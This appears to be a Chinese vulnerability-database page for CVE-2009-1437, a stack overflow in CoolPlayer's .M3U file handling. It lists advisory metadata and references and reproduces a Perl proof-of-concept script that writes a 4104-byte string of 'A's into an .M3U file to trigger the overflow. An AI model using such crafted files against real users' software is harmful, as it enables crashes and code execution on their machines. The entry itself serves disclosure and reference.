CoolPlayer M3U文件处理栈溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117618 漏洞类型 缓冲区溢出
发布时间 2009-04-20 更新时间 2009-04-27
CVE编号 CVE-2009-1437 CNNVD-ID CNNVD-200904-490
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/8489
https://cxsecurity.com/issue/WLB-2009040239
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-490
|漏洞详情
CoolPlayer是一款开放源码的音频播放器。CoolPlayer在处理畸形.M3U文件时存在栈溢出漏洞,如果用户受骗加载了包含有超过260字节字符串的.M3U文件的话,就可以触发这个溢出,导致执行任意指令。
|漏洞EXP
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ##  ##
# #  CoolPlayerp Portable 2.19.1 (.M3U File) Local Stack Overflow POC   # #
# ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ## ### ## ## ## ## 
my $chars= "A" x 4104;
my $file="goldm.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created \n";
print "Thanx Tryag.Com";

# milw0rm.com [2009-04-20]
|参考资料

来源:XF
名称:coolplayerportable-m3u-bo(49984)
链接:http://xforce.iss.net/xforce/xfdb/49984
来源:MILW0RM
名称:8520
链接:http://www.milw0rm.com/exploits/8520
来源:MILW0RM
名称:8519
链接:http://www.milw0rm.com/exploits/8519
来源:MILW0RM
名称:8489
链接:http://www.milw0rm.com/exploits/8489
来源:SECUNIA
名称:34816
链接:http://secunia.com/advisories/34816
来源:OSVDB
名称:53885
链接:http://osvdb.org/53885